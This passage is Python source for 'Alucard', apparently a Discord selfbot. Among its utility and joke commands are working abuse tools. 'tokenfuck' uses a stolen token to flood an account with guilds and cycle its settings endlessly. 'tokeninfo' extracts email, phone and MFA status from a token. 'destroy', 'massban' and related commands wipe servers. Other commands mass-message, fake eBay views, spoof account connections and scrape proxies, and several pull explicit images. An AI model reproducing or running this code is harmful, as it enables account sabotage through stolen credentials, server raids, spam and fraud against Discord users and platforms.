encoded_stuff = str(decoded_stuff)
encoded_stuff = encoded_stuff[2:len(encoded_stuff)-1]
await ctx.send(encoded_stuff)
@Alucard.command()
async def decode(ctx, string): # b'\xfc'+
await ctx.message.delete()
strOne = (string).encode("ascii")
pad = len(strOne)%4
strOne += b"="*pad
encoded_stuff = codecs.decode(strOne.strip(),'base64')
decoded_stuff = str(encoded_stuff)
decoded_stuff = decoded_stuff[2:len(decoded_stuff)-1]
await ctx.send(decoded_stuff)
@Alucard.command(name='ebay-view', aliases=['ebay-view-bot', 'ebayviewbot', 'ebayview'])
async def _ebay_view(ctx, url, views: int): # b'\xfc'
await ctx.message.delete()
start_time = datetime.datetime.now()
def EbayViewer(url, views):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}
for _i in range(views):
requests.get(url, headers=headers)
EbayViewer(url, views)
elapsed_time = datetime.datetime.now() - start_time
em = discord.Embed(title='Ebay View Bot')
em.add_field(name='Views sent', value=views, inline=False)
em.add_field(name='Elapsed time', value=elapsed_time, inline=False)
await ctx.send(embed=em)
@Alucard.command(aliases=['geolocate', 'iptogeo', 'iptolocation', 'ip2geo', 'ip'])
async def geoip(ctx, *, ipaddr: str = '1.3.3.7'): # b'\xfc'
await ctx.message.delete()
r = requests.get(f'http://extreme-ip-lookup.com/json/{ipaddr}')
geo = r.json()
em = discord.Embed()
fields = [
{'name': 'IP', 'value': geo['query']},
{'name': 'ipType', 'value': geo['ipType']},
{'name': 'Country', 'value': geo['country']},
{'name': 'City', 'value': geo['city']},
{'name': 'Continent', 'value': geo['continent']},
{'name': 'Country', 'value': geo['country']},
{'name': 'IPName', 'value': geo['ipName']},
{'name': 'ISP', 'value': geo['isp']},
{'name': 'Latitute', 'value': geo['lat']},
{'name': 'Longitude', 'value': geo['lon']},
{'name': 'Org', 'value': geo['org']},
{'name': 'Region', 'value': geo['region']},
{'name': 'Status', 'value': geo['status']},
]
for field in fields:
if field['value']:
em.add_field(name=field['name'], value=field['value'], inline=True)
return await ctx.send(embed=em)
@Alucard.command()
async def pingweb(ctx, website = None): # b'\xfc'
await ctx.message.delete()
if website is None:
pass
else:
try:
r = requests.get(website).status_code
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
if r == 404:
await ctx.send(f'Site is down, responded with a status code of {r}', delete_after=3)
else:
await ctx.send(f'Site is up, responded with a status code of {r}', delete_after=3)
@Alucard.command()
async def tweet(ctx, username: str, *, message: str): # b'\xfc'
await ctx.message.delete()
async with aiohttp.ClientSession() as cs:
async with cs.get(f"https://nekobot.xyz/api/imagegen?type=tweet&username={username}&text={message}") as r:
res = await r.json()
em = discord.Embed()
em.set_image(url=res["message"])
await ctx.send(embed=em)
@Alucard.command()
async def revav(ctx, user: discord.Member=None): # b'\xfc'
await ctx.message.delete()
if user is None:
user = ctx.author
try:
em = discord.Embed(description=f"https://images.google.com/searchbyimage?image_url={user.avatar_url}")
await ctx.send(embed=em)
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command(aliases=['pfp', 'avatar'])
async def av(ctx, *, user: discord.Member=None): # b'\xfc'
await ctx.message.delete()
format = "gif"
user = user or ctx.author
if user.is_avatar_animated() != True:
format = "png"
avatar = user.avatar_url_as(format = format if format != "gif" else None)
async with aiohttp.ClientSession() as session:
async with session.get(str(avatar)) as resp:
image = await resp.read()
with io.BytesIO(image) as file:
await ctx.send(file = discord.File(file, f"Avatar.{format}"))
@Alucard.command(aliases=['ri', 'role'])
async def roleinfo(ctx, *, role: discord.Role): # b'\xfc'
await ctx.message.delete()
guild = ctx.guild
since_created = (ctx.message.created_at - role.created_at).days
role_created = role.created_at.strftime("%d %b %Y %H:%M")
created_on = "{} ({} days ago)".format(role_created, since_created)
users = len([x for x in guild.members if role in x.roles])
if str(role.colour) == "#000000":
colour = "default"
color = ("#%06x" % random.randint(0, 0xFFFFFF))
color = int(colour[1:], 16)
else:
colour = str(role.colour).upper()
color = role.colour
em = discord.Embed(colour=color)
em.set_author(name=f"Name: {role.name}"
f"\nRole ID: {role.id}")
em.add_field(name="Users", value=users)
em.add_field(name="Mentionable", value=role.mentionable)
em.add_field(name="Hoist", value=role.hoist)
em.add_field(name="Position", value=role.position)
em.add_field(name="Managed", value=role.managed)
em.add_field(name="Colour", value=colour)
em.add_field(name='Creation Date', value=created_on)
await ctx.send(embed=em)
@Alucard.command()
async def whois(ctx, *, user: discord.Member = None): # b'\xfc'
await ctx.message.delete()
if user is None:
user = ctx.author
date_format = "%a, %d %b %Y %I:%M %p"
em = discord.Embed(description=user.mention)
em.set_author(name=str(user), icon_url=user.avatar_url)
em.set_thumbnail(url=user.avatar_url)
em.add_field(name="Joined", value=user.joined_at.strftime(date_format))
members = sorted(ctx.guild.members, key=lambda m: m.joined_at)
em.add_field(name="Join position", value=str(members.index(user)+1))
em.add_field(name="Registered", value=user.created_at.strftime(date_format))
if len(user.roles) > 1:
role_string = ' '.join([r.mention for r in user.roles][1:])
em.add_field(name="Roles [{}]".format(len(user.roles)-1), value=role_string, inline=False)
perm_string = ', '.join([str(p[0]).replace("_", " ").title() for p in user.guild_permissions if p[1]])
em.add_field(name="Guild permissions", value=perm_string, inline=False)
em.set_footer(text='ID: ' + str(user.id))
return await ctx.send(embed=em)
@Alucard.command()
async def minesweeper(ctx, size: int = 5): # b'\xfc'
await ctx.message.delete()
size = max(min(size, 8), 2)
bombs = [[random.randint(0, size - 1), random.randint(0, size - 1)] for x in range(int(size - 1))]
is_on_board = lambda x, y: 0 <= x < size and 0 <= y < size
has_bomb = lambda x, y: [i for i in bombs if i[0] == x and i[1] == y]
message = "**Click to play**:\n"
for y in range(size):
for x in range(size):
tile = "||{}||".format(chr(11036))
if has_bomb(x, y):
tile = "||{}||".format(chr(128163))
else:
count = 0
for xmod, ymod in m_offets:
if is_on_board(x + xmod, y + ymod) and has_bomb(x + xmod, y + ymod):
count += 1
if count != 0:
tile = "||{}||".format(m_numbers[count - 1])
message += tile
message += "\n"
await ctx.send(message)
@Alucard.command()
async def combine(ctx, name1, name2): # b'\xfc'
await ctx.message.delete()
name1letters = name1[:round(len(name1) / 2)]
name2letters = name2[round(len(name2) / 2):]
ship = "".join([name1letters, name2letters])
emb = (discord.Embed(description=f"{ship}"))
emb.set_author(name=f"{name1} + {name2}")
await ctx.send(embed=emb)
@Alucard.command(name='1337-speak', aliases=['1337speak'])
async def _1337_speak(ctx, *, text): # b'\xfc'
await ctx.message.delete()
text = text.replace('a', '4').replace('A', '4').replace('e', '3')\
.replace('E', '3').replace('i', '!').replace('I', '!')\
.replace('o', '0').replace('O', '0').replace('u', '|_|').replace('U', '|_|')
await ctx.send(f'`{text}`')
@Alucard.command(aliases=['dvwl'])
async def devowel(ctx, *, text): # b'\xfc'
await ctx.message.delete()
dvl = text.replace('a', '').replace('A', '').replace('e', '')\
.replace('E', '').replace('i', '').replace('I', '')\
.replace('o', '').replace('O', '').replace('u', '').replace('U', '')
await ctx.send(dvl)
@Alucard.command()
async def blank(ctx): # b'\xfc'
await ctx.message.delete()
if config.get('password') == 'password-here':
print(f"{Fore.RED}[ERROR] {Fore.YELLOW}You didnt put your password in the config.json file"+Fore.RESET)
else:
password = config.get('password')
with open('Images/Avatars/Transparent.png', 'rb') as f:
try:
await Alucard.user.edit(password=password, username="ٴٴٴٴ", avatar=f.read())
except discord.HTTPException as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command(aliases=['pfpget', 'stealpfp'])
async def pfpsteal(ctx, user: discord.Member): # b'\xfc'
await ctx.message.delete()
if config.get('password') == 'password-here':
print(f"{Fore.RED}[ERROR] {Fore.YELLOW}You didnt put your password in the config.json file"+Fore.RESET)
else:
password = config.get('password')
with open('Images/Avatars/Stolen/Stolen.png', 'wb') as f:
r = requests.get(user.avatar_url, stream=True)
for block in r.iter_content(1024):
if not block:
break
f.write(block)
try:
Image.open('Images/Avatars/Stolen/Stolen.png').convert('RGB')
with open('Images/Avatars/Stolen/Stolen.png', 'rb') as f:
await Alucard.user.edit(password=password, avatar=f.read())
except discord.HTTPException as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command(name='set-pfp', aliases=['setpfp', 'pfpset'])
async def _set_pfp(ctx, *, url): # b'\xfc'
await ctx.message.delete()
if config.get('password') == 'password-here':
print(f"{Fore.RED}[ERROR] {Fore.YELLOW}You didnt put your password in the config.json file"+Fore.RESET)
else:
password = config.get('password')
with open('Images/Avatars/PFP-1.png', 'wb') as f:
r = requests.get(url, stream=True)
for block in r.iter_content(1024):
if not block:
break
f.write(block)
try:
Image.open('Images/Avatars/PFP-1.png' ).convert('RGB')
with open('Images/Avatars/PFP-1.png', 'rb') as f:
await Alucard.user.edit(password=password, avatar=f.read())
except discord.HTTPException as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command(aliases=['dong', 'penis'])
async def dick(ctx, *, user: discord.Member = None): # b'\xfc'
await ctx.message.delete()
if user is None:
user = ctx.author
size = random.randint(1, 15)
dong = ""
for _i in range(0, size):
dong += "="
em = discord.Embed(title=f"{user}'s Dick size", description=f"8{dong}D", colour=0x0000)
await ctx.send(embed=em)
@Alucard.command(aliases=['changehypesquad'])
async def hypesquad(ctx, house): # b'\xfc'
await ctx.message.delete()
request = requests.Session()
headers = {
'Authorization': token,
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.305 Chrome/69.0.3497.128 Electron/4.0.8 Safari/537.36'
}
if house == "bravery":
payload = {'house_id': 1}
elif house == "brilliance":
payload = {'house_id': 2}
elif house == "balance":
payload = {'house_id': 3}
elif house == "random":
houses = [1, 2, 3]
payload = {'house_id': random.choice(houses)}
try:
request.post('https://discordapp.com/api/v6/hypesquad/online', headers=headers, json=payload, timeout=10)
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command(aliases=['tokenfucker', 'disable', 'crash'])
async def tokenfuck(ctx, _token): # b'\xfc'
await ctx.message.delete()
headers = {
'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
'Content-Type': 'application/json',
'Authorization': _token,
}
request = requests.Session()
payload = {
'theme': "light",
'locale': "ja",
'message_display_compact': False,
'inline_embed_media': False,
'inline_attachment_media': False,
'gif_auto_play': False,
'render_embeds': False,
'render_reactions': False,
'animate_emoji': False,
'convert_emoticons': False,
'enable_tts_command': False,
'explicit_content_filter': '0',
'status': "invisible"
}
guild = {
'channels': None,
'icon': None,
'name': "ALUCARD",
'region': "europe"
}
for _i in range(50):
requests.post('https://discordapp.com/api/v6/guilds', headers=headers, json=guild)
while True:
try:
request.patch("https://canary.discordapp.com/api/v6/users/@me/settings",headers=headers, json=payload)
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
else:
break
modes = cycle(["light", "dark"])
statuses = cycle(["online", "idle", "dnd", "invisible"])
while True:
setting = {
'theme': next(modes),
'locale': random.choice(locales),
'status': next(statuses)
}
while True:
try:
request.patch("https://canary.discordapp.com/api/v6/users/@me/settings",headers=headers, json=setting, timeout=10)
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
else:
break
@Alucard.command()
async def masslogin(ctx, choice = None): # b'\xfc'
await ctx.message.delete()
_masslogin(choice)
@Alucard.command()
async def masscon(ctx, _type, amount: int, *, name=None): # b'\xfc'
await ctx.message.delete()
payload = {
'name': name,
'visibility': 1
}
headers = {
'Authorization': token,
'Content-Type':'application/json',
}
avaliable = [
'battlenet',
'skype',
'leagueoflegends'
]
if name is None:
name = 'about:blank'
elif _type not in avaliable:
print(f'Avaliable connections: {avaliable}')
for _i in range(amount):
try:
ID = random.randint(10000000, 90000000)
time.sleep(5)
r = requests.put(f'https://canary.discordapp.com/api/v6/users/@me/connections/{_type}/{ID}', data=json.dumps(payload), headers=headers)
if r.status_code == 200:
print(f"[{Fore.GREEN}+{Fore.RESET}] New connection added!")
else:
print(f"[{Fore.RED}-{Fore.RESET}] Couldnt add connection!");break
except (Exception, ValueError) as e:
print(e);break
print(f"[{Fore.GREEN}+{Fore.RESET}] Finished adding connections!")
@Alucard.command(aliases=['fakeconnection', 'spoofconnection'])
async def fakenet(ctx, _type, *, name = None): # b'\xfc'
await ctx.message.delete()
ID = random.randrange(10000000, 90000000)
avaliable = [
'battlenet',
'skype',
'leagueoflegends'
]
payload = {
'name': name,
'visibility': 1
}
headers = {
'Authorization': token,
'Content-Type':'application/json',
}
if name is None:
name = 'about:blank'
elif _type not in avaliable:
await ctx.send(f'Avaliable connections: `{avaliable}`', delete_after = 3)
r = requests.put(f'https://canary.discordapp.com/api/v6/users/@me/connections/{_type}/{ID}', data=json.dumps(payload), headers=headers)
if r.status_code == 200:
await ctx.send(f"Added connection: `{type}` with Username: `{name}` and ID: `{ID}`", delete_after = 3)
else:
await ctx.send('Some error has happened with the endpoint', delete_after = 3)
@Alucard.command(aliases=['tokinfo', 'tdox'])
async def tokeninfo(ctx, _token): # b'\xfc'
await ctx.message.delete()
headers = {
'Authorization': _token,
'Content-Type': 'application/json'
}
try:
res = requests.get('https://canary.discordapp.com/api/v6/users/@me', headers=headers)
res = res.json()
user_id = res['id']
locale = res['locale']
avatar_id = res['avatar']
language = languages.get(locale)
creation_date = datetime.datetime.utcfromtimestamp(((int(user_id) >> 22) + 1420070400000) / 1000).strftime('%d-%m-%Y %H:%M:%S UTC')
except KeyError:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Invalid token"+Fore.RESET)
em = discord.Embed(
description=f"Name: `{res['username']}#{res['discriminator']}`\nID: `{res['id']}`\nEmail: `{res['email']}`\nCreation Date: `{creation_date}`\nProfile picture: [**Click here**](https://cdn.discordapp.com/avatars/{user_id}/{avatar_id})")
fields = [
{'name': 'Phone', 'value': res['phone']},
{'name': 'Flags', 'value': res['flags']},
{'name': 'Local language', 'value': res['locale'] + f"{language}"},
{'name': 'MFA?', 'value': res['mfa_enabled']},
{'name': 'Verified?', 'value': res['verified']},
]
for field in fields:
if field['value']:
em.add_field(name=field['name'], value=field['value'], inline=False)
em.set_thumbnail(url=f"https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}")
return await ctx.send(embed=em)
@Alucard.command()
async def copy(ctx): # b'\xfc'
await ctx.message.delete()
await Alucard.create_guild(f'backup-{ctx.guild.name}')
await asyncio.sleep(4)
for g in Alucard.guilds:
if f'backup-{ctx.guild.name}' in g.name:
for c in g.channels:
await c.delete()
for cate in ctx.guild.categories:
x = await g.create_category(f"{cate.name}")
for chann in cate.channels:
if isinstance(chann, discord.VoiceChannel):
await x.create_voice_channel(f"{chann}")
if isinstance(chann, discord.TextChannel):
await x.create_text_channel(f"{chann}")
try:
await g.edit(icon=ctx.guild.icon_url)
except:
pass
@Alucard.command()
async def destroy(ctx): # b'\xfc'
await ctx.message.delete()
for channel in list(ctx.guild.channels):
try:
await channel.delete()
except:
pass
for user in list(ctx.guild.members):
try:
await user.ban()
except:
pass
for role in list(ctx.guild.roles):
try:
await role.delete()
except:
pass
try:
await ctx.guild.edit(
name=RandString(),
description="https://alucard.wtf",
reason="https://alucard-selfbot.github.io",
icon=None,
banner=None
)
except:
pass
for _i in range(250):
await ctx.guild.create_text_channel(name=RandString())
for _i in range(250):
await ctx.guild.create_role(name=RandString(), color=RandomColor())
@Alucard.command()
async def dmall(ctx, *, message): # b'\xfc'
await ctx.message.delete()
for user in list(ctx.guild.members):
try:
await asyncio.sleep(5)
await user.send(message)
except:
pass
@Alucard.command()
async def massban(ctx): # b'\xfc'
await ctx.message.delete()
for user in list(ctx.guild.members):
try:
await user.ban()
except:
pass
@Alucard.command()
async def masskick(ctx): # b'\xfc'
await ctx.message.delete()
for user in list(ctx.guild.members):
try:
await user.kick()
except:
pass
@Alucard.command()
async def massrole(ctx): # b'\xfc'
await ctx.message.delete()
for _i in range(250):
try:
await ctx.guild.create_role(name=RandString(), color=RandomColor())
except:
return
@Alucard.command()
async def masschannel(ctx): # b'\xfc'
await ctx.message.delete()
for _i in range(250):
try:
await ctx.guild.create_text_channel(name=RandString())
except:
return
@Alucard.command()
async def delchannels(ctx): # b'\xfc'
await ctx.message.delete()
for channel in list(ctx.guild.channels):
try:
await channel.delete()
except:
return
@Alucard.command()
async def delroles(ctx): # b'\xfc'
await ctx.message.delete()
for role in list(ctx.guild.roles):
try:
await role.delete()
except:
pass
@Alucard.command()
async def massunban(ctx): # b'\xfc'
await ctx.message.delete()
banlist = await ctx.guild.bans()
for users in banlist:
try:
await asyncio.sleep(2)
await ctx.guild.unban(user=users.user)
except:
pass
@Alucard.command()
async def spam(ctx, amount: int, *, message): # b'\xfc'
await ctx.message.delete()
for _i in range(amount):
await ctx.send(message)
@Alucard.command()
async def dm(ctx, user : discord.Member, *, message): # b'\xfc'
await ctx.message.delete()
user = Alucard.get_user(user.id)
if ctx.author.id == Alucard.user.id:
return
else:
try:
await user.send(message)
except:
pass
@Alucard.command(name='get-color', aliases=['color', 'colour', 'sc'])
async def _get_color(ctx, *, color: discord.Colour): # b'\xfc'
await ctx.message.delete()
file = io.BytesIO()
Image.new('RGB', (200, 90), color.to_rgb()).save(file, format='PNG')
file.seek(0)
em = discord.Embed(color=color, title=f'Showing Color: {str(color)}')
em.set_image(url='attachment://color.png')
await ctx.send(file=discord.File(file, 'color.png'), embed=em)
@Alucard.command()
async def tinyurl(ctx, *, link): # b'\xfc'
await ctx.message.delete()
r = requests.get(f'http://tinyurl.com/api-create.php?url={link}').text
em = discord.Embed()
em.add_field(name='Shortened link', value=r, inline=False )
await ctx.send(embed=em)
@Alucard.command(aliases=['rainbow-role'])
async def rainbow(ctx, *, role): # b'\xfc'
await ctx.message.delete()
role = discord.utils.get(ctx.guild.roles, name=role)
while True:
try:
await role.edit(role=role, colour=RandomColor())
await asyncio.sleep(10)
except:
break
@Alucard.command(name='8ball')
async def _ball(ctx, *, question): # b'\xfc'
await ctx.message.delete()
responses = [
'That is a resounding no',
'It is not looking likely',
'Too hard to tell',
'It is quite possible',
'That is a definite yes!',
'Maybe',
'There is a good chance'
]
answer = random.choice(responses)
embed = discord.Embed()
embed.add_field(name="Question", value=question, inline=False)
embed.add_field(name="Answer", value=answer, inline=False)
embed.set_thumbnail(url="https://www.horoscope.com/images-US/games/game-magic-8-ball-no-text.png")
embed.set_footer(text=datetime.datetime.now())
await ctx.send(embed=embed)
@Alucard.command(aliases=['slots', 'bet'])
async def slot(ctx): # b'\xfc'
await ctx.message.delete()
emojis = "🍎🍊🍐🍋🍉🍇🍓🍒"
a = random.choice(emojis)
b = random.choice(emojis)
c = random.choice(emojis)
slotmachine = f"**[ {a} {b} {c} ]\n{ctx.author.name}**,"
if (a == b == c):
await ctx.send(embed=discord.Embed.from_dict({"title":"Slot machine", "description":f"{slotmachine} All matchings, you won!"}))
elif (a == b) or (a == c) or (b == c):
await ctx.send(embed=discord.Embed.from_dict({"title":"Slot machine", "description":f"{slotmachine} 2 in a row, you won!"}))
else:
await ctx.send(embed=discord.Embed.from_dict({"title":"Slot machine", "description":f"{slotmachine} No match, you lost"}))
@Alucard.command()
async def joke(ctx): # b'\xfc'
await ctx.message.delete()
headers = {
"Accept": "application/json"
}
async with aiohttp.ClientSession()as session:
async with session.get("https://icanhazdadjoke.com", headers=headers) as req:
r = await req.json()
await ctx.send(r["joke"])
@Alucard.command(name='auto-bump', aliases=['bump'])
async def _auto_bump(ctx, channelid): # b'\xfc'
await ctx.message.delete()
count = 0
while True:
try:
count += 1
channel = Alucard.get_channel(int(channelid))
await channel.send('!d bump')
print(f'{Fore.BLUE}[AUTO-BUMP] {Fore.GREEN}Bump number: {count} sent'+Fore.RESET)
await asyncio.sleep(7200)
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command()
async def tts(ctx, *, message): # b'\xfc'
await ctx.message.delete()
buff = await do_tts(message)
await ctx.send(file=discord.File(buff, f"{message}.wav"))
@Alucard.command()
async def upper(ctx, *, message): # b'\xfc'
await ctx.message.delete()
message = message.upper()
await ctx.send(message)
@Alucard.command(aliases=['guildpfp'])
async def guildicon(ctx): # b'\xfc'
await ctx.message.delete()
em = discord.Embed(title=ctx.guild.name)
em.set_image(url=ctx.guild.icon_url)
await ctx.send(embed=em)
@Alucard.command(name='backup-f', aliases=['friendbackup', 'friend-backup', 'backup-friends', 'backupf'])
async def _backup_f(ctx): # b'\xfc'
await ctx.message.delete()
for friend in Alucard.user.friends:
friendlist = (friend.name)+'#'+(friend.discriminator)
with open('Backup/Friends.txt', 'a+') as f:
f.write(friendlist+"\n" )
for block in Alucard.user.blocked:
blocklist = (block.name)+'#'+(block.discriminator)
with open('Backup/Blocked.txt', 'a+') as f:
f.write(blocklist+"\n" )
@Alucard.command(name='first-message', aliases=['firstmsg', 'fm', 'firstmessage'])
async def _first_message(ctx, channel: discord.TextChannel = None): # b'\xfc'
await ctx.message.delete()
if channel is None:
channel = ctx.channel
first_message = (await channel.history(limit=1, oldest_first=True).flatten())[0]
embed = discord.Embed(description=first_message.content)
embed.add_field(name="First Message", value=f"[Jump]({first_message.jump_url})")
await ctx.send(embed=embed)
@Alucard.command()
async def mac(ctx, mac): # b'\xfc'
await ctx.message.delete()
r = requests.get('http://api.macvendors.com/' + mac)
em = discord.Embed(title='MAC Lookup Result', description=r.text, colour=0xDEADBF)
em.set_author(name='MAC Finder', icon_url='https://regmedia.co.uk/2016/09/22/wifi_icon_shutterstock.jpg?x=1200&y=794')
await ctx.send(embed=em)
@Alucard.command()
async def abc(ctx): # b'\xfc'
await ctx.message.delete()
ABC = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'ñ', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
message = await ctx.send(ABC[0])
await asyncio.sleep(2)
for _next in ABC[1:]:
await message.edit(content=_next)
await asyncio.sleep(2)
@Alucard.command(aliases=['bitcoin'])
async def btc(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get('https://min-api.cryptocompare.com/data/price?fsym=BTC&tsyms=USD,EUR')
r = r.json()
usd = r['USD']
eur = r['EUR']
em = discord.Embed(description=f'USD: `{str(usd)}$`\nEUR: `{str(eur)}€`')
em.set_author(name='Bitcoin', icon_url='https://cdn.pixabay.com/photo/2013/12/08/12/12/bitcoin-225079_960_720.png')
await ctx.send(embed=em)
@Alucard.command(aliases=['ethereum'])
async def eth(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get('https://min-api.cryptocompare.com/data/price?fsym=ETH&tsyms=USD,EUR')
r = r.json()
usd = r['USD']
eur = r['EUR']
em = discord.Embed(description=f'USD: `{str(usd)}$`\nEUR: `{str(eur)}€`')
em.set_author(name='Ethereum', icon_url='https://cdn.discordapp.com/attachments/271256875205525504/374282740218200064/2000px-Ethereum_logo.png')
await ctx.send(embed=em)
@Alucard.command()
async def topic(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get('https://www.conversationstarters.com/generator.php').content
soup = bs4(r, 'html.parser')
topic = soup.find(id="random").text
await ctx.send(topic)
@Alucard.command(aliases=['wouldyourather', 'would-you-rather', 'wyrq'])
async def wyr(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get('https://www.conversationstarters.com/wyrqlist.php').text
soup = bs4(r, 'html.parser')
qa = soup.find(id='qa').text
qor = soup.find(id='qor').text
qb = soup.find(id='qb').text
em = discord.Embed(description=f'{qa}\n{qor}\n{qb}')
await ctx.send(embed=em)
@Alucard.command()
async def hastebin(ctx, *, message): # b'\xfc'
await ctx.message.delete()
r = requests.post("https://hastebin.com/documents", data=message).json()
await ctx.send(f"<https://hastebin.com/{r['key']}>")
@Alucard.command()
async def ascii(ctx, *, text): # b'\xfc'
await ctx.message.delete()
r = requests.get(f'http://artii.herokuapp.com/make?text={urllib.parse.quote_plus(text)}').text
if len('```'+r+'```') > 2000:
return
await ctx.send(f"```{r}```")
@Alucard.command()
async def anal(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/anal")
res = r.json()
em = discord.Embed()
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def erofeet(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/erofeet")
res = r.json()
em = discord.Embed()
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def feet(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/feetg")
res = r.json()
em = discord.Embed()
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def hentai(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/Random_hentai_gif")
res = r.json()
em = discord.Embed()
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def boobs(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/boobs")
res = r.json()
em = discord.Embed()
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def tits(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/tits")
res = r.json()
em = discord.Embed()
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def blowjob(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/blowjob")
res = r.json()
em = discord.Embed()
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def lewdneko(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/nsfw_neko_gif")
res = r.json()
em = discord.Embed()
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def lesbian(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/les")
res = r.json()
em = discord.Embed()
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def feed(ctx, user: discord.Member): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/feed")
res = r.json()
em = discord.Embed(description=user.mention)
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def tickle(ctx, user: discord.Member): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/tickle")
res = r.json()
em = discord.Embed(description=user.mention)
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def slap(ctx, user: discord.Member): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/slap")
res = r.json()
em = discord.Embed(description=user.mention)
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def hug(ctx, user: discord.Member): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/hug")
res = r.json()
em = discord.Embed(description=user.mention)
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def smug(ctx, user: discord.Member): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/smug")
res = r.json()
em = discord.Embed(description=user.mention)
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def pat(ctx, user: discord.Member): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/pat")
res = r.json()
em = discord.Embed(description=user.mention)
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command()
async def kiss(ctx, user: discord.Member): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://nekos.life/api/v2/img/kiss")
res = r.json()
em = discord.Embed(description=user.mention)
em.set_image(url=res['url'])
await ctx.send(embed=em)
@Alucard.command(aliases=['proxy'])
async def proxies(ctx): # b'\xfc'
await ctx.message.delete()
file = open("Data/Http-proxies.txt", "a+")
res = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=http&timeout=1500')
proxies = []
for proxy in res.text.split('\n'):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
for p in proxies:
file.write((p)+"\n")
file = open("Data/Https-proxies.txt", "a+")
res = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=https&timeout=1500')
proxies = []
for proxy in res.text.split('\n'):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
for p in proxies:
file.write((p)+"\n")
file = open("Data/Socks4-proxies.txt", "a+")
res = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&timeout=1500')
proxies = []
for proxy in res.text.split('\n'):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
for p in proxies:
file.write((p)+"\n")
file = open("Data/Socks5-proxies.txt", "a+")
res = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&timeout=1500')
proxies = []
for proxy in res.text.split('\n'):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
for p in proxies:
file.write((p)+"\n")
@Alucard.command()
async def uptime(ctx): # b'\xfc'
await ctx.message.delete()
uptime = datetime.datetime.utcnow() - start_time
uptime = str(uptime).split('.')[0]
await ctx.send(f'`'+uptime+'`')
@Alucard.command()
async def purge(ctx, amount: int): # b'\xfc'
await ctx.message.delete()
